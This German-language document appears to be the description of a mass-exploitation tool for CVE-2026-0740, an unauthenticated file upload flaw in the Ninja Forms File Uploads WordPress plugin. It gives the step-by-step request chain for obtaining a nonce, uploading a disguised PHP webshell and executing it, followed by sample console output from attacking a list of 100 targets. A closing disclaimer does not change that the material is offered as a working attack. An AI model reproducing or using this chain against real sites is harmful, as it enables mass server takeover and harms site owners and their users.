
Automatisierter Massen-Exploiter für CVE-2026-0740, einen nicht authentifizierten beliebigen Datei-Upload im Ninja Forms File Uploads Plugin, der Remote-Code-Ausführung über manipulierte Uploads ermöglicht.
Das Ninja Forms - File Uploads Plugin für WordPress ist anfällig für nicht authentifizierte beliebige Datei-Uploads aufgrund fehlender Dateityp-Validierung und fehlender Berechtigungsprüfungen in der Funktion 'NF_FU_AJAX_Controllers_Uploads::handle_upload' in allen Versionen bis einschließlich 3.3.26.
Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern:
~ CVSS-Score: 9.8 (Kritisch)
~ Betroffene Versionen: <= 3.3.26
Schritt 1: Nonce abrufen
────────────────────────────────────
POST /wp-admin/admin-ajax.php
Daten: action=nf_fu_get_new_nonce&field_id=7&form_id=7
Antwort: {"success":true,"data":{"nonce":"7a850757a1"}}
│
▼
Schritt 2: Getarnte Datei hochladen + in PHP umbenennen
──────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
Daten:
- action=nf_fu_upload
- nonce=7a850757a1
- field_id=7
- form_id=7
- [email protected] (Whitelist-Erweiterung)
- doc_pdf=shadow.php (Umbenennungsziel)
│
▼
Schritt 3: Server speichert bösartige Datei
─────────────────────────────────────
Speicherort: /wp-content/uploads/ninja-forms/tmp/shadow.php
Inhalt: PHP-Shell (Uploader / Webshell)
│
▼
Schritt 4: Hochgeladene Datei ausführen
────────────────────────────────────
GET /wp-content/uploads/ninja-forms/tmp/shadow.php
→ Webshell ausführen
→ Vollständige Serverübernahme
- Schlussfolgerungen aus Feldexperimenten:
1. Der Endpunkt `nf_fu_get_new_nonce` gibt eine gültige Nonce zurück, ohne die Existenz des Feldes zu prüfen
→ Keine Validierung der Parameter `field_id` und `form_id` (JEDE zufällige ID funktioniert)
2. Kritischer logischer Fehler in der Umbenennungsfunktion
→ Das Plugin akzeptiert einen vom Benutzer bereitgestellten Dateinamen über den POST-Parameter
→ Keine Validierung der endgültigen Dateierweiterung nach der Umbenennung
3. Die hochgeladene Datei landet direkt in einem webbasiert zugänglichen Verzeichnis
→ /wp-content/uploads/ninja-forms/tmp/
4. Der Besitzer dieses Tools ist sehr gutaussehend
˚⊱🪷⊰˚ NINJA FORMS MASS EXPLOITER ˚⊱🪷⊰˚
╰┈➤ Vollständige Antwortanzeige
[+] 100 Ziele geladen
[1/100]
😈 [FRISKA RESEARCHER] Angriff auf: https://example.com
[*] Nonce wird abgerufen...
[*] HTTP-Status: 400
[*] Antwort: 0
[-] HTTP-Fehler: 400
[2/100]
😈 [FRISKA RESEARCHER] Angriff auf: https://www.test.com
[*] Nonce wird abgerufen...
[*] HTTP-Status: 200
[*] Antwort: {"success":true,"data":{"nonce":"b0404ec210","nonce_expiry":1775648146}}
[+] Nonce: b0404ec210
[*] Shell wird hochgeladen...
[*] Upload-Antwort: {"data":{"files":[{"name":"doc.pdf","full_path":"doc.pdf","type":"application\/pdf","tmp_name":"shadow.php","error":0,"size":246,"new_tmp_key":"doc_pdf"}]},"errors":[],"debug":[]}
============================================================
🔥 SHELL-UPLOADER: https://www.test.com/wp-content/uploads/ninja-forms/tmp/shadow.php
============================================================
Die unbefugte Nutzung von Systemen, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben, ist illegal.